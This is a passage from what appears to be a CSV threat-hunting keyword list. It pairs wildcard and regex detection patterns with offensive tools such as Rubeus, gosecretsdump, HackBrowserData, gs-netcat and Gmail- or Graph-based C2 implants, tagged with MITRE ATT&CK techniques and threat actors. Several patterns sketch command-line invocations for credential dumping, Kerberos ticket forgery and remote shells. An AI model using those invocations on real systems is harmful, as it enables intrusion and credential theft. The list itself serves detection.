- T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-ExfilDataToGitHub.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* 
giop-info.nse*",".{0,1000}\sgiop\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* github repos list --org*",".{0,1000}\sgithub\srepos\slist\s\-\-org.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "* github repos list --user *",".{0,1000}\sgithub\srepos\slist\s\-\-user\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "* give-dcsync*",".{0,1000}\sgive\-dcsync.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "* give-genericall * -target-sid *",".{0,1000}\sgive\-genericall\s.{0,1000}\s\-target\-sid\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "* gkrellm-info.nse*",".{0,1000}\sgkrellm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* gmailC2.exe*",".{0,1000}\sgmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "* --gmsa-decrypt-lsa *",".{0,1000}\s\-\-gmsa\-decrypt\-lsa\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* go build -o padre .*",".{0,1000}\sgo\sbuild\s\-o\spadre\s\..{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation
Tools","https://github.com/glebarez/padre","1","0","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "* golden * /badpwdcount*",".{0,1000}\sgolden\s.{0,1000}\s\/badpwdcount.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* golden * /ldap *",".{0,1000}\sgolden\s.{0,1000}\s\/ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* golden * /user:*",".{0,1000}\sgolden\s.{0,1000}\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* goldenPac.py *",".{0,1000}\sgoldenPac\.py\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* goldenPac.py -c *.exe*",".{0,1000}\sgoldenPac\.py\s\-c\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* goldenPac.py*",".{0,1000}\sgoldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* gopher-ls.nse*",".{0,1000}\sgopher\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* gophish-*.zip*",".{0,1000}\sgophish\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "* gosecretsdump_linux*",".{0,1000}\sgosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "* 
gosecretsdump_mac*",".{0,1000}\sgosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "* gosecretsdump_win*",".{0,1000}\sgosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "* goWMIExec_linux_*",".{0,1000}\sgoWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "* goWMIExec_mac_*",".{0,1000}\sgoWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "* goWMIExec_win_*",".{0,1000}\sgoWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "* 'GPODDITY$' *",".{0,1000}\s\'GPODDITY\$\'\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* --gpo-id * --domain * --command 
*",".{0,1000}\s\-\-gpo\-id\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-command\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* --gpo-id * --gpo-type * --no-smb-server *",".{0,1000}\s\-\-gpo\-id\s.{0,1000}\s\-\-gpo\-type\s.{0,1000}\s\-\-no\-smb\-server\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* --GPOName * --FilterEnabled --TargetDnsName *",".{0,1000}\s\-\-GPOName\s.{0,1000}\s\-\-FilterEnabled\s\-\-TargetDnsName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* gpp_autologin*",".{0,1000}\sgpp_autologin.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* gpp_password*",".{0,1000}\sgpp_password.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* gpsd-info.nse*",".{0,1000}\sgpsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--------------------- GraphRunner Module ----------------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sGraphRunner\sModule\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* GraphRunner.ps1*",".{0,1000}\sGraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* GraphSpy.py*",".{0,1000}\sGraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "* GraphStrike.py*",".{0,1000}\sGraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "* GreatSCT/*",".{0,1000}\sGreatSCT\/.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* --greeting * --personalize *--securelink*",".{0,1000}\s\-\-greeting\s.{0,1000}\s\-\-personalize\s.{0,1000}\-\-securelink.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "* -grouper2 -Command *",".{0,1000}\s\-grouper2\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* gs-netcat *",".{0,1000}\sgs\-netcat\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "* gsocket.io/x*",".{0,1000}\sgsocket\.io\/x.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "* GSOCKET_SOCKS_IP*",".{0,1000}\sGSOCKET_SOCKS_IP.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "* gtfobin_update.py*",".{0,1000}\sgtfobin_update\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* gtfonow.py*",".{0,1000}\sgtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* -H * -u * -p * -r 
*C$/Users*",".{0,1000}\s\-H\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-r\s.{0,1000}C\$\/Users.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "* -h *-p * -c cypher.bin -k key.bin*",".{0,1000}\s\-h\s.{0,1000}\-p\s.{0,1000}\s\-c\scypher\.bin\s\-k\skey\.bin.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "* hack.py*",".{0,1000}\shack\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* HackBrowserData",".{0,1000}\sHackBrowserData","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "* 
HackBrowserData*",".{0,1000}\sHackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "* hacked_getdents*",".{0,1000}\shacked_getdents.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "* hackergu *",".{0,1000}\shackergu\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - 
T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-datanode-info.nse*",".{0,1000}\shadoop\-datanode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-jobtracker-info.nse*",".{0,1000}\shadoop\-jobtracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-namenode-info.nse*",".{0,1000}\shadoop\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-secondary-namenode-info.nse*",".{0,1000}\shadoop\-secondary\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-tasktracker-info.nse*",".{0,1000}\shadoop\-tasktracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Hak5.sh*",".{0,1000}\sHak5\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* harvest * /monitorinterval:*",".{0,1000}\sharvest\s.{0,1000}\s\/monitorinterval\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
